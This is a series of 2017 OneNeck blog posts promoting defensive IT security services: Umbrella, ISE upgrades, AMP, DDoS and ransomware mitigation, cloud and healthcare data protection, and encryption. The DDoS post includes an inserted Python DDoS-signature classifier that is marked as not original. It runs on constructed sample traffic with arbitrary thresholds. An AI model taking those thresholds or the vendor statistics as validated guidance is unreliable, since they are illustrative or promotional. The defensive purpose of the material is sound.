Next question any IT professional is going to ask: How complex is it to set up? Since Umbrella’s delivered via the cloud, there is no hardware to install or update, and provisioning is done in minutes on all on-network devices (including BYOD and IoT), and you can use your existing Cisco footprint — AnyConnect, Integrated Services Router (ISR) 4K Series, and Wireless LAN Controller 5520 and 8540 — to quickly provision thousands of network egresses and roaming laptops.

So, if you’re looking for a solution that will keep your users safe outside the perimeter in the big, scary world of malicious sites, consider what Umbrella can do for you. You can’t control everyone on the outside, but you can sleep better knowing that they’re protected, and in turn, so are you.


Strategic IT Planning | Upgrading Cisco ISE | OneNeck
https://www.oneneck.com/blog/security/strategic-it-planning-when-upgrading-cisco-ise/
Tue, 03 Oct 2017 17:00:00 +0000

As a longtime Cisco partner, we’ve been a part of many Cisco Identity Services Engine (ISE) implementations and upgrades, giving us first-hand knowledge of not only how ISE helps our customers meet enterprise mobility challenges, but also gleaned some insider tips and tricks on how best to execute upgrades.

I recently sat down with Josh Gross, a OneNeck security engineer, to discuss Cisco ISE and some of the challenges he’s seeing customers face when upgrading.

What is the latest version of ISE, and what are some of the new features and benefits associated with the newest release?

The latest version of ISE is version 2.2. It offers some refinements on ISE 2.1 with an ability to detect MAC spoofing and enhancements to the migration tool for users looking to migrate to ISE from legacy TACACS. They’ve also done some interesting things with guest access, including wireless guest portal provisioning available through a wizard in the ISE console, which will even configure the wireless LAN controller. It also supports JSON for new APIs which can add new scripting functionality.

When and why would a company need to upgrade their ISE deployment?

ISE is frequently implementing new features and functionality, and our customers usually upgrade for one of those features. In the 2.0 update, they included the ability to configure TACACS access in ISE. Most ISE 1.x customers are paying licensing for a separate TACACS solution, and they frequently upgrade when they are ready to move their TACACS to ISE.

What are some key factors that could affect their upgrade time?

The primary factor in the length of time it takes to upgrade an ISE solution is the number of ISE servers deployed. For scalability, ISE can be set up in a multi-server configuration with different ISE servers providing different functions or ‘personas’ (administration, monitoring, policy service). The ISE upgrade process upgrades the servers serially to minimize downtime.

Once in flight, what are some of the challenges you’ve seen during the upgrade process?

The challenges during the upgrade processes are usually related to the ISE configuration. Frequently I see an upgrade complete successfully, but I will have to disconnect and re-connect to third-party authentication systems such as Active Directory for them to begin functioning.

Sometimes, in multi-server deployments, some servers in the infrastructure will not upgrade successfully. If that happens, you can generally rebuild the server as a new node and re-join the cluster.

Any troubleshooting tips for the most common upgrade failures?

I always make sure to take an operational backup prior to trying an upgrade. It helps if everything fails and I have to restore. If ISE is implemented using virtual machines, I recommend taking a snapshot as well. I also plan for a service outage during the upgrade, because servers usually need to be rebooted and issues occasionally occur.

Keep in mind that, in a lot of cases, you can save time rebuilding a node rather than trying to troubleshoot what failed during the upgrade. ISE should always have at least a primary and secondary node and as long as one of the nodes is functional, the others can be rebuilt and re-joined.

 

LEARN MORE about ISE: Healthcare Has an Identity Problem

“AMP” Your Endpoint Protection | IT Security Solutions
https://www.oneneck.com/blog/security/how-to-amp-your-endpoint-protection/
Thu, 07 Sep 2017 17:00:00 +0000

Malware is a broad term that encompasses any form of software designed to damage, steal or corrupt data. Ransomware, trojans, worms and rootkits are common malware examples, but the list is far more exhaustive, making fighting malware a normal part of operations for SMBs and corporations alike.

A recent cybersecurity report indicates that more organizations are coming under attack with very costly consequences. One in three businesses hit with malware in 2016 experienced a 20 percent or more revenue loss. A separate report found that one in five companies targeted by malware will go out of business (this is especially true for SMBs). Despite the documented and highly publicized threatscape, 90 percent of companies invested more heavily in IT security in the aftermath of a breach.

Five Ways to Mitigate Risk Now

Being proactive against malware isn’t just a good idea; it’s a business imperative driven by due diligence and compliance. In a recent white paper, Cisco outlines five steps to take now:

  1. Fortify the Perimeter
    Address threats as close to the network perimeter as possible to prevent malware from reaching endpoint devices. Implement a network-based security solution to utilize cloud and onboard sandboxes for evaluating potential threats.
  2. Protect Inside the Network
    Choose advanced protection that looks for malware on network segments that store sensitive technology assets.
  3. Protect the Endpoints
    Ensure strong defense at each endpoint, and don’t rely on perimeter security for blocking all threats. Endpoint protection must include personal devices, even those not connected through the company network.
  4. Analyze Threats
    Keep track of all egress traffic for exfiltration of sensitive data. Command-and-control traffic should also be analyzed for signs of a compromised device.
  5. Quarantine Malware and Prevent Reinfection
    Quarantine and clean infected devices. Track every file on every device to identify patient zero (the first infected victim) and ensure all subsequent infections are cleaned.

Keeping Your Endpoints Protected with One Tool

One cannot begin addressing the threat landscape without considering the risk endpoints bring into an organization. But it can get murky understanding where endpoint protection (EPP) ends and endpoint detection and response (EDR) begins. Gartner recently pointed out that, “by 2019, EPP and EDR capabilities will have merged into a single offering.” This is a positive for our customers, as it provides a comprehensive set of capabilities within one platform, eliminating the need to manage two different solutions. Enter Cisco Advanced Malware Protection (AMP).

Cisco’s AMP combines malware detection, malware prevention and malware protection all in one. It introduces the latest in global threat intelligence and advanced sandboxing for keeping the most sophisticated malware at bay by:

  • Delivering unmatched global threat intelligence to strengthen front-line defenses
  • Providing deep visibility into the origin and scope of a compromise
  • Rapidly detecting, responding to and remediating malware
  • Preventing costly reinfection and remediation scenarios
  • Streamlining protection everywhere—network, endpoints, mobile devices, email and web—before, during and after an attack

AMP has been researched by TechValidate, and its findings speak for themselves:

  • 86 percent of users agreed AMP for endpoint protection increased their security effectiveness.
  • 88 percent of users believed AMP detects threats faster than other security solutions.
  • 72 percent believed AMP accelerated overall incident response rate.

AMP has been used by industries all over the globe. Prominent users include Georgetown University, Yokogawa Electric Corporation, TMB Bank Company, HCL Technologies and even the Saudi Arabian National Guard.

The threat of malware requires robust security designed to combat it, and AMP is a powerful tool for threat remediation. Not sure if Cisco AMP is a right fit for your security strategy? Contact one of our security experts to discuss your security profile and better understand the gaps that are putting you at risk. Now is the time to plan – not after the attacker is inside.

 

LEARN MORE: Understanding a CIO’s Role in Cybersecurity

The Age of Digital Disruption | Rethinking IT Security
https://www.oneneck.com/blog/security/rethinking-it-security-in-an-age-of-digital-disruption/
Thu, 17 Aug 2017 17:00:00 +0000

Digital transformation is disrupting the old ways of doing business by introducing digital technologies into the workplace and enabling employees to perform tasks in more efficient and productive ways, which in turn brings exponential new opportunity for business growth.

However, with digital transformation comes risk. The devices, software and technologies that are transforming your business need to be protected from hackers, insider threats and other cyberattacks. While digital transformation is reshaping the way companies do business, it is also forcing companies to reshape the way they approach their security.

Security Risks in the Digital Transformation
Protecting networks and data is a top priority of IT departments today. A single data breach or security incident can destroy an organization’s reputation, and the financial costs can shutter a small business.

But the truth is, security can be difficult to ensure because there are so many variables involved, and the digital environment is constantly changing. Users make mistakes that can harm under-protected systems, so applications need to be consistently updated and patched to prevent hackers from sneaking through new vulnerabilities.

And then there is the ever-increasing number of endpoints and applications attached to the network. Estimates show most employees used at least five devices in 2016 to access corporate data. With Bring Your Own Device (BYOD), many employees are using their personal devices and favorite applications to conduct work, often without permission or knowledge of the IT department. While all of these endpoints and applications improve worker productivity, they create a potential nightmare scenario for security.

Rethinking the Approach to Security
Overall cybersecurity spending is expected to hit $90 billion this year, with many organizations increasing their budgets to fight against mounting threats. However, traditional approaches to security aren’t as effective as hackers become more sophisticated and find ways to circumvent legacy security methods.

To counter the increasing stealth and persistence of modern cyber threats, organizations need to shift to a more holistic approach to cybersecurity. The holistic approach integrates technology with human behaviors and physical considerations and recognizes that security incidents go beyond simply dumping malware into a network.

They require a human to plan the attack and a human to make a mistake; they also factor in location or industry, or in some cases, something as simple as dropping an infected USB flash drive on someone’s desk in hopes of them plugging it into the company network. By looking at the overall picture of how cyber threats happen, you can better map your security plan to address them. But effective cybersecurity takes a very tactical approach to win the battle. Our partner, VMware, recommends taking these tactical steps in an effort to start building a defense:

  • Simplify security models by replacing ad-hoc, poorly coordinated systems with collaborative, unified architectures that deliver protection efficiently and effectively.
  • Implement a ubiquitous software layer across the application infrastructure and endpoints to abstract infrastructure from the applications running on it.
  • Gain more visibility and context to more fully understand interactions between users, applications and data to better pinpoint security vulnerabilities and align security controls and policies to applications.

The digital transformation has opened doors for many businesses to thrive and is creating opportunities never seen before. But as you rely on more applications and endpoints to access your network, the threat level rises.

By rethinking your security approach, your business becomes better equipped to meet new threat challenges. A good starting point is working with an IT solutions company like OneNeck to establish a plan that protects your applications, infrastructure and endpoints. With this in place, you can improve visibility into your company’s digital interactions and better protect your most sensitive holdings.

A 4-Step Approach to Mitigating DDoS Attacks | OneNeck
https://www.oneneck.com/blog/security/4-step-approach-to-mitigating-ddos-attacks/
Thu, 10 Aug 2017 17:00:00 +0000

Distributed Denial of Service (DDoS) attacks aren’t like other types of cyber-attacks. They don’t spread malware into your network, and they don’t directly hijack sensitive data or steal from bank accounts. However, the financial and reputational damage caused by DDoS can be devastating to your business. They are also one of the most difficult types of cyber-attacks to defend against.

DDoS Attacks are Easy and Inexpensive to Launch

Hackers use the DDoS attack vector because it is easy, cheap and effective. Many target the Domain Name System (DNS), a core service essential to website accessibility. Groups like Anonymous use DDoS attacks as political statements, purposely disrupting web traffic as a form of protest. Hackers also use DDoS as a diversion, putting attention on the shuttered websites while proceeding with a more devastating cyber-attack elsewhere in the system.

DDoS attacks have increased 85 percent in each of the past two years. The costs of a DDoS attack are skyrocketing, as well, costing companies more than $2 million every time they are hit. Hackers are also taking advantage of new technology. In 2016, they infected Internet of Things (IoT) devices with the Mirai botnet, which, when activated, overwhelmed DNS provider Dyn and took down hundreds of popular websites.

3 Common DDoS Attacks

Hackers have a variety of methods to deploy DDoS attacks, but most cybersecurity experts put the attacks into three classifications:

  • Volumetric – The goal of volumetric attacks is to overwhelm an organization’s bandwidth so others can’t access it. The most common DDoS attack in this category is the User Datagram Protocol (UDP) Flood. Volumetric attacks make up the majority of DDoS attacks.
  • Protocol – Protocol attacks focus on weaknesses in the protocol. SYN Flood, which targets the way systems “speak” to each other to open connections, is the most widely used of these attacks.
  • Application – Application attacks hit weaknesses in specific applications rather than target the entire server. Focused on exploiting vulnerabilities in individual applications, these attacks use fewer resources than other types. Slowloris is a popular type of application attack, targeting web servers.
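A defender's view of those three categories is what they look like in traffic telemetry. The classifier below, an added example that is not from the original post or any vendor product, flags each signature in a constructed one-second window of flow records; the record format, thresholds and sample traffic are all assumptions to be tuned to a real link.

```python
"""Heuristic DDoS classifier over a one-second window of flow records.

Added example, not from the original post or any vendor product: the
Flow record format, thresholds and sample traffic are constructed
assumptions chosen to illustrate the three categories described above.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    proto: str                  # "udp" or "tcp"
    src: str                    # source IP (RFC 5737 documentation ranges)
    dport: int                  # destination port
    packets: int                # packets seen in the window
    nbytes: int                 # bytes seen in the window
    tcp_flags: str = ""         # "S" = bare SYN never completed, "SA" = handshake done
    http_complete: bool = True  # did the HTTP request headers finish?
    duration_s: float = 0.0     # how long the connection has been open


# Constructed thresholds for a 1-second window; tune to the link in question.
UDP_BYTES_PER_SEC = 100_000_000   # 800 Mbit/s of UDP: volumetric (UDP flood)
SYN_HALF_OPEN_RATIO = 0.8         # share of TCP flows stuck at SYN: protocol (SYN flood)
SYN_HALF_OPEN_MIN = 100
SLOW_CONN_MIN = 50                # long-lived, never-finished requests: application (Slowloris)
SLOW_CONN_SECONDS = 30.0


def classify_window(flows, window_s=1.0):
    """Return the DDoS categories whose signature appears in the window."""
    findings = []

    # Volumetric: raw UDP volume aimed at us, regardless of content.
    udp_bytes = sum(f.nbytes for f in flows if f.proto == "udp")
    if udp_bytes / window_s >= UDP_BYTES_PER_SEC:
        findings.append("volumetric")

    # Protocol: many handshakes that never complete exhaust the SYN backlog.
    tcp = [f for f in flows if f.proto == "tcp"]
    half_open = [f for f in tcp if f.tcp_flags == "S"]
    if len(half_open) >= SYN_HALF_OPEN_MIN and len(half_open) / len(tcp) >= SYN_HALF_OPEN_RATIO:
        findings.append("protocol")

    # Application: few packets, but many connections held open with
    # incomplete HTTP headers tie up web-server worker slots.
    slow = [
        f for f in tcp
        if f.dport in (80, 443) and not f.http_complete and f.duration_s >= SLOW_CONN_SECONDS
    ]
    if len(slow) >= SLOW_CONN_MIN:
        findings.append("application")

    return findings


# Constructed sample windows for each pattern plus a benign baseline.
def sample_udp_flood():
    return [Flow("udp", f"198.51.100.{i % 250}", 53, 1_000, 1_000_000) for i in range(200)]


def sample_syn_flood():
    return [Flow("tcp", f"192.0.2.{i % 250}", 443, 1, 60, tcp_flags="S") for i in range(1_000)]


def sample_slowloris():
    return [
        Flow("tcp", "203.0.113.7", 80, 5, 400, tcp_flags="SA", http_complete=False, duration_s=120.0)
        for _ in range(80)
    ]


def sample_normal():
    web = [Flow("tcp", f"203.0.113.{i}", 443, 40, 30_000, tcp_flags="SA", duration_s=2.0) for i in range(20)]
    dns = [Flow("udp", f"203.0.113.{i}", 53, 2, 200) for i in range(5)]
    return web + dns


if __name__ == "__main__":
    for name, window in [("udp flood", sample_udp_flood()), ("syn flood", sample_syn_flood()),
                         ("slowloris", sample_slowloris()), ("normal", sample_normal())]:
        print(f"{name:10s} -> {classify_window(window) or ['none']}")
```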

Mitigating DDoS Attacks

According to a study by Neustar and Harris Interactive, nine in ten companies are bumping up their DDoS defenses in the next year in response to the rise in attacks. While it is next to impossible to prevent DDoS attacks, there are steps organizations can take to make it more difficult to completely disrupt a website. As Rachel Kartch explained in an SEI blog post, the following four steps will help you mitigate a DDoS attack:

  1. Ensure the architecture is resilient by dispersing data assets in multiple locations and networks. This allows for business continuity in any type of disaster.
  2. Use hardware, like firewalls and load balancers, validated for their ability to block or mitigate DDoS attacks.
  3. Scale up bandwidth as much as you can afford. The more bandwidth available, the more likely you can slow down if not stave off an attack.
  4. Outsource DDoS security to a provider experienced in dealing with these attacks.

DDoS attacks are hard to defend against or anticipate. It’s vital to build a DDoS plan of action into any security policy, but it is equally important to have the tools in place to limit any outage.

With our comprehensive security services, OneNeck’s security experts can custom-tailor a security solution specific to your exact business needs, helping you secure and mitigate threats to your applications and infrastructure.

LEARN MORE: Q&A with a Security Executive, OneNeck’s Katie McCullough, Vice President, Information Security & Business Applications

Protect Against Ransomware | OneNeck IT Security Checklist
https://www.oneneck.com/blog/security/8-point-checklist-to-protect-your-business-from-ransomware/
Tue, 18 Jul 2017 17:00:00 +0000

Ransomware was big business last year, estimated to have grossed cybercriminals $1 billion. More than half of US companies experienced a ransomware attack in 2016, and the threat continues to be a major concern for organizations.

WannaCry, the massive ransomware attack that quickly spread across 150 countries and infected more than 300,000 computers in May, was stopped relatively quickly. But even weeks after a security researcher deactivated the attack, the same malware strain continued to scan networks and look for the same vulnerabilities.

With ransomware virus threats continuing to grow, this will continue to be at the top of mind for IT. But what about your organization? Are you sure you’re doing everything you can to protect your business from a ransomware virus?

How Ransomware Works

A ransomware infection often starts with an exploit kit that identifies software vulnerabilities, such as unpatched security flaws on endpoints. The exploit kit may be delivered through a phishing email containing malicious attachments or links. In the case of WannaCry, the culprit was not phishing, but rather, a set of NSA cyber espionage tools leaked by the secretive group, the Shadow Brokers.

After the initial payload exploits a system and analyzes its environment, the ransomware is delivered and a “callback” is made to the ransomware infrastructure to retrieve keys for encrypting the endpoint.

Once a computer is compromised, the user cannot access its contents without paying a ransom or restoring the system from a backup. But a backup in and of itself is not enough to fully protect systems against a ransomware infection. A comprehensive ransomware defense strategy includes:

  1. Backing up all data. Make sure your data is not only backed up regularly, but also has a system-state backup or snapshot.
  2. Patching systems regularly. Ransomware attackers frequently target systems running outdated software with known vulnerabilities. Patching software vulnerabilities as soon as fixes are available is the best way to prevent your system from being exploited. Case in point: Microsoft created a patch available for the vulnerability exploited by WannaCry months before the attack.
  3. Educating employees. The weakest link in a security defense is human. Educate users on various social engineering threat techniques — like phishing, for example — to protect them from falling prey.
  4. Layered security. A layered security approach with technology such as next-generation firewalls and intrusion prevention systems (IPS) removes single points of failure, enabling you to enforce security measures at multiple areas of your network.
  5. Network segmentation. Limiting the resources attackers can access will help protect your network from a broader infection.
  6. Monitor network activity. You need visibility to know what to protect.
  7. Protect endpoints. In the age of BYOD, cloud computing and the IoT, you need a solution that gives you visibility into the security of all devices that connect to your network.
  8. Use real-time threat intelligence. Big data-driven threat intelligence arms you with knowledge about real-time threats, enabling you to proactively defend your organization.

Check Out Cisco’s Ultimate Checklist to Preventing and Fighting Ransomware Attacks

In addition to taking these steps, it helps to work with an experienced IT security solutions provider, like OneNeck, with the skilled resources to keep up with constant changes on the ransomware landscape and technology to bolster your defenses.

A CIO’s Role in Cybersecurity | OneNeck IT Solutions
https://www.oneneck.com/blog/security/understanding-a-cio-s-role-in-cybersecurity/
Thu, 29 Jun 2017 17:00:00 +0000

Today’s CIOs must achieve a delicate balance between meeting business objectives and providing security for their most critical data and systems. As more organizations migrate operations to the cloud, cybersecurity is a critical consideration, but there are many other components to consider as well. If your business needs to meet compliance regulations such as PCI DSS, CERT, FINRA and HIPAA, you must have the structure in place to ensure you can pass audits. So, while security needs to be a major factor when evaluating cloud providers, it’s important to understand all of the parameters that play a part.

Risk, security, and compliance in the cloud

The successful businesses of yesteryear were built on legacy and on-premises data centers, posing challenges to modernizing systems. As these systems reach the end of their lifecycle, IT departments are receiving more requests from senior executives to migrate to the cloud and replace or integrate existing systems in the interest of cost efficiency and business agility.

But, according to a survey by ESG, more than 85% of senior IT executives migrating to the cloud are concerned or very concerned about cloud security. Whether it’s from malicious intent, politically motivated or an insider mistake, significant security challenges persist including:

  • Attacks are becoming more frequent and more sophisticated
  • Readily available toolkits make it easy for low-skilled attackers to launch sophisticated attacks such as ransomware and other malware
  • Mobile devices have significantly increased the attack surface, and the number of endpoints that need protection has grown exponentially
  • The pace of application changes and system updates makes it difficult to close vulnerabilities in time

The role CIOs must play to ensure cloud security

The CIO’s primary objective is to meet business goals such as improving customer experience, organizational agility, and optimizing new digital revenue streams. But none of this can be accomplished without a secure infrastructure.

In the cloud, data protection operates on a shared responsibility model, where both cloud providers and customers share the burden of ensuring security and meeting compliance mandates. But the ultimate responsibility for security lies with your organization and those who will have to answer to the boardroom in the event of a breach.

The cloud model your organization employs, public, private or hybrid, will determine the level of security provided by your cloud provider. Organizations have more extensive responsibilities for Infrastructure as a Service (IaaS) and Platform as a Service (PaaS) as compared to Software as a Service (SaaS) applications. With IaaS and PaaS, the risks include the potential cessation of business operations, failing a compliance audit, or being hit with a security breach.

Key security considerations for cloud migration

CIOs must take steps to ensure security during the cloud migration process. Here are some questions to ask when evaluating cloud providers:

  • Will my cloud infrastructure use least privilege policies for data access without compromising security?
  • Are applications or platforms designed with built-in security features such as an enterprise identity management system?
  • How will we encrypt data in motion or at rest during the migration process and beyond?
  • What third-party compliance standards must be met, and how do the cloud provider’s security controls map to industry standards?
  • How does the cloud provider document its security for compliance purposes?

Once you understand your requirements in the context of cloud offerings, you will be in a better position to implement security protections.

OneNeck IT Solutions understands that maintaining data security in the cloud is a complex undertaking. Our industry experts can help protect your resources from incurring outages and your data from exfiltration through proper design, system segmentation, and access control. Contact us to learn more.

10 Data Security Tips to Safeguard Your Business | OneNeck https://www.oneneck.com/blog/security/10-data-security-tips-to-safeguard-your-business/ Tue, 13 Jun 2017 17:00:00 +0000

Loss Prevention and Protection

As a result of the digital economy, the IT landscape is changing before our eyes. Cloud, big data, social and mobile have accelerated the pace of business like we have never seen. The Internet of Things (IoT) is expanding at a prolific pace, with the market expected to reach $1.7 trillion by 2020. Advanced robotics, automation and artificial intelligence (AI) are quickly adding to the mix, and the regulations governing all this growth haven’t really caught up.

As we have seen from increasingly high-profile breaches, when these advancements move faster than IT can keep up, vulnerabilities increase. The costs of a breach are rising, and as new legislation and compliance mandates are created, the penalties for noncompliance are increasing as well. The C-suite is on edge, and boardroom conversations have turned to questioning IT practices and policies for data security, encryption, network security and endpoint protection. It is critical to remain vigilant as data breaches become a daily threat.

The following 10 data security tips are not fail-proof, but they will reduce vulnerabilities, increase data protections, and improve your ability to respond and recover should you become a cybersecurity victim.

  1. Inventory Data

You need to know where your sensitive data resides in order to protect it. It’s critical to monitor this data for unusual activity that could indicate a compromise. Understanding which data is most important will also help you remediate and recover faster in the event of a breach.

  2. Use Encryption

Data needs to be encrypted in motion or at rest whether on servers, laptops, tablets or smartphones. Encryption is mandatory to comply with industry regulations and protects your organization so that if your data falls into the wrong hands it will be useless to them.

  3. Segregate Data

Sensitive data should be isolated from data that has a lower risk profile. Place stronger protections around sensitive data and ensure that if a breach takes place, the attacker is unable to reach the company’s crown jewels.

  4. Enact a Mobile Device Action Plan

According to Tech Pro Research, 74% of companies allow employees to use their personal devices for work-related purposes. Set policies that stop employees from storing sensitive company data on personal devices, require device password protection and data encryption, and require security apps to be installed. Educate employees on reporting procedures and institute remote wipe for lost or stolen equipment.

  5. Set Backup Procedures

Critical data should be backed up daily and, in the case of critical transactional data, even more frequently. Make sure backups are accessible at the time of a breach, and practice backup and restore procedures to ensure your ability to recover quickly. Some data may also need to be stored offsite and offline to protect its integrity.

  6. Secure Your Wi-Fi

Hackers are looking for ways into your network, and your Wi-Fi is a vulnerability. Several policies need to be put in place to lower your risk, such as monitoring the network for intrusions, using Wi-Fi encryption protocols, changing default passwords, controlling signal range and implementing Wi-Fi security tools.

  7. Employ Least Privileges

No single employee, whether a systems administrator, a marketing admin or the CEO should have access to all your data. Employ least privilege policies so that employees are only allowed to access the data they need to do their job. Staff should also not be allowed to install any software or make any system updates without authorization.

  8. Institute Strong Password Policies

While there are many ways to break into your systems, stolen passwords still present a big threat. Policies such as two-factor authentication, complex passwords and frequent password updates go a long way toward ensuring credentials are useless if they fall into the wrong hands. Policies should also mandate changing hard-coded and default passwords, which pose a great risk, especially on IoT devices.

  9. Vet Cloud Vendors, Managed Service Providers and Colocation Facilities

While these vendors are your partners in keeping your organization operational and safe, don’t go in blind. Assess your current infrastructure needs and use that assessment to question how the provider will address your unique data scenarios and security needs. A true partner will work with you to ensure that your needs are met with the expertise you need.

  10. Be Prepared

The worst-case scenarios need to be practiced and responses perfected. Create a playbook that outlines all policies and procedures that need to be enacted in the event of a data breach or cyberattack. How will you respond to ransomware? What will you do if a device is stolen? How will you know if data is being extracted at 3 am? Don’t be caught off-guard.

There are many exciting opportunities that come with the digital economy. In order to realize the benefits, you need a partner who will ensure your infrastructure is not only optimized but also protected. At OneNeck® IT Solutions, our qualified engineers can work with you to determine your unique security risks and develop a plan to address those risks and defend your network. As a complete hybrid IT solutions provider, we implement security best practices as an integral part of your network, data center, collaboration and mobility solutions.

Keeping Your Data Secure | Healthcare Hybrid IT Solutions https://www.oneneck.com/blog/security/what-you-need-to-consider-to-keep-your-healthcare-data-secure/ Tue, 06 Jun 2017 17:00:00 +0000

The healthcare IT market is expected to double — reaching a projected $280 billion by 2020. The federal portion of national healthcare spending, according to the Federal government, will grow 86%, from $920 billion in 2015 to $1.7 trillion by 2025. Deltek’s Federal Health Information Technology Market report states that as the need for improvements in healthcare quality, interoperability and privacy grows, federal agencies acting as payers, promoters and providers will continue to invest in technologies and solutions to improve health outcomes and reduce waste, fraud and abuse.

Electronic patient records, new healthcare applications, connected medical devices and regulatory/compliance changes, such as the HITECH Act, MACRA, and the 21st Century Cures Act, are making it easier for doctors to share patient records, affect patient outcomes and increase the quality of care, but are also contributing to an explosion in healthcare data. Top federal health IT areas of focus include data standardization, data integrity, information exchange, interoperability, analytics, storage, infrastructure modernization, legacy system modernization, cloud adoption, telehealth and mobile applications.

This rapid growth is enabling innovation and changing patient expectations, but posing significant challenges for IT to meet demands. As Government agencies like the VA and DoD move to modernize and digitalize systems, the growth of big data and information sharing is heightening risk.

Healthcare agencies need to not only deliver improved care and patient experience but also ensure that patient data and privacy are protected.

Healthcare IT Threat Landscape

According to the Ponemon Institute, the top cyber threats for healthcare organizations in 2016 were ransomware, malware and distributed denial of service (DDoS) attacks. Many cybersecurity experts consider ransomware the fastest-growing threat across all industries, but healthcare organizations are especially vulnerable due to their need for uptime and willingness to pay.

In 2016, we saw a record number of attacks on healthcare organizations, such as Bon Secours and Hollywood Presbyterian, and so far 2017 is following suit.

Other threats include:

  • Medjacking: The Hospira insulin pump and St. Jude cardiac devices are examples of how hackers could take advantage of medical devices with security vulnerabilities.
  • The Internet of Medical Things: From wearable patient devices to remote monitoring apps, more endpoints are connecting to healthcare networks. Each represents a new potential entry point for hackers.
  • Insiders: The majority of data breaches are caused by compromised accounts, and IT professionals need to pay attention not only to malicious insiders but also to risks resulting from human error.

Combating Healthcare Threats

Healthcare IT must design a plan that takes a holistic approach to data security and combines technology, people and processes.

  • Follow Industry Standards: The NIST Cybersecurity Framework, a set of standards, guidelines and best practices created through a collaboration between industry and government to promote the protection of critical infrastructure, is a good starting point for government health IT.
  • Institute Workforce Training: Training the workforce on current threats, how to spot malicious links and how to detect phishing attempts has been proven to significantly reduce this common threat, and it deserves more emphasis.
  • Update Legacy Technology: Legacy technology is among the biggest challenges for government healthcare IT. Organizations need to find and patch all vulnerabilities resulting from applications and systems that are no longer supported, and make a plan to update and modernize technology where feasible.
  • Employ Encryption: All data should be encrypted, whether at rest or in motion. The case of Denton Heart Group is a case in point: an unencrypted hard drive that contained seven years of backup electronic health record data was stolen, exposing over 200,000 patient records.

Creating an IT Healthcare Plan

Today’s healthcare CIOs must balance stringent security and privacy regulations with a need to meet consumer demands and provide an excellent patient experience. As healthcare IT leaders depend on technology investments to modernize the healthcare experience and differentiate their organization they must not lose sight of security concerns.

OneNeck IT Solutions is committed to helping our customers support best practices, mitigate costs, improve service levels and meet industry compliance regulations. Our experts have a broad degree of experience working with healthcare organizations to improve efficiency and agility while providing the highest level of protection for healthcare data.

Q&A with a Security Executive | Custom IT Security Solutions https://www.oneneck.com/blog/security/q-and-a-with-a-security-executive/ Thu, 13 Apr 2017 17:00:00 +0000

Q.  Many experts maintain that the total cost of ransomware in 2016 was over a billion dollars – that’s a staggering number. With the rate of sophisticated security attacks increasing at an alarming rate, how can an organization protect themselves from data leaks and/or malicious security attacks?

A. Focus on the basics. Make sure servers and workstations are properly patched, as known vulnerabilities that are years old continue to be a threat to companies (2016 Data Breach Investigations Report from Verizon). Constantly communicate with and educate your user base regarding the risks of malware and other fraud. And finally, be prepared with a plan, backups and other contacts for when something bad happens.

Q. Why are identity, credential and access management so critical in combatting today’s security threats?

A. Credentials can be one of the weakest links to an environment. According to the Verizon Report, 63% of confirmed data breaches involved weak, default or stolen passwords. 

So, start with the base philosophy of two fundamental principles: Least Access and Least Privilege.

  • Least Access: Users shall be granted access only to those information assets necessary to perform their duties.
  • Least Privilege: Users shall not be permitted any more than the least privileges necessary for processing the information assets to which they have been granted access.

Use and enforce good password practices (SANS Password Protection Policy).  And invest in multi-factor authentication for your access into your core environment and critical systems.

Q. With the vast majority of enterprise businesses leveraging the cloud, it’s no surprise that securing the critical data that’s moving to the cloud is top of mind. What security considerations should an organization keep top of mind when evaluating a cloud provider?

A. Get to know the vendor and their operations. Talk to the cloud service provider’s head of security, and understand their approach – what keeps them up at night. Do your due diligence and get updated copies of compliance reports that the vendor provides. And finally, start small and invest in penetration testing and vulnerability scans of your environment.

Q. By enabling the convenience of “anywhere, anytime,” we’ve seen an emergence of Shadow IT, where LOBs are bypassing IT in order to get things done. What recommendations would you give today’s frustrated IT teams struggling to retain control and keep the infrastructure secure, all while dealing with rogue cloud services?

A. Security is all about risk management, and we have to be here to support the business in the tools and timing they need to get things done. The most important aspect is communication, so you can at least do an assessment on what is being used by the business, how it is being accessed and who is handling the account management, what data is involved both in transit and at rest, and what security the cloud services have in place. Get it documented, and have the business sign off.

Q. As a provider of cloud, colocation and various advanced IT services, OneNeck has to keep security front and center to ensure we’re not putting our customers at risk. In your role as OneNeck’s VP of Information Security and Business Applications, what are you and your team doing to ensure the security of OneNeck’s customer data?

A. Most important, staying involved with our customers and our operations to know what challenges they are dealing with and keeping them informed of risks to their business. We stay involved in the industry and with our vendors to be aware of threats, how to prevent them or at least quickly detect and address any issues. And of course, leveraging the experience throughout the family of TDS companies to constantly evaluate and improve our security practices.

Do You DARE? Protect Your Data at Rest with Encryption https://www.oneneck.com/blog/security/do-you-dare-protect-your-data-at-rest-with-encryption/ Tue, 11 Apr 2017 17:00:00 +0000

Sensitive business data at rest in the cloud is more vulnerable than ever before.  Ensuring that this critical corporate data is secure against unauthorized access and meets any organizational policies, industry or government regulations, is of critical importance to many CIOs.

What is data at rest?

Data at rest is data that is not actively moving from device to device or network to network, such as data stored on cloud servers. Encrypting this sensitive data stored in the cloud (data-at-rest encryption, or DARE) ensures that anyone who gains unauthorized physical access to the storage media cannot read the data. Many compliance standards, such as the Health Insurance Portability and Accountability Act (HIPAA), require this security control to be in place to tightly guard patient information.

Whether you are storing data at rest in a private or public cloud, DARE is a critical component of the overall security posture for sensitive data. It is increasingly important in cloud environments, which are inherently multi-tenant architectures.

How DARE Works

DARE secures your critical data even when the media is removed from the array. Many DARE solutions use a high-performance inline encryption technique to ensure that all data stored on the array is unusable if the SSD media is removed. This prevents unauthorized access in the event of theft or loss during transport, and makes it possible to return or replace failed components that contain sensitive data.

In addition, XtremIO self-encrypting drives (SEDs) use the hardware-based Advanced Encryption Standard (AES) with 256-bit keys. AES is a widely used block cipher standard and is accepted by the most rigorous regulations and federal government standards.

When OneNeck was rigorously testing various all-flash technologies, we ultimately found that, for our customers, the ability to provide DARE with zero impact on application performance was a win-win for us and our customers.

That alone was worth it, but this solution provides one more huge benefit: an additional layer of security. It provides DARE without OneNeck having to manage encryption keys in any way. This is critical, because some technologies require external encryption keys, which can be lost or stolen, resulting in data unavailability or giving malicious users access to what was supposed to be protected data.

This means the best of both worlds for our customers, incredible application performance, along with powerful Data At Rest Encryption.

Does your Cloud Provider DARE?

A recent study of 12,000 cloud providers conducted by Skyhigh, a leading cloud access security broker, found that only 9.4% of cloud providers are encrypting data at rest. That’s pretty unnerving when you consider that the cloud is now home to a significant amount of sensitive corporate data.

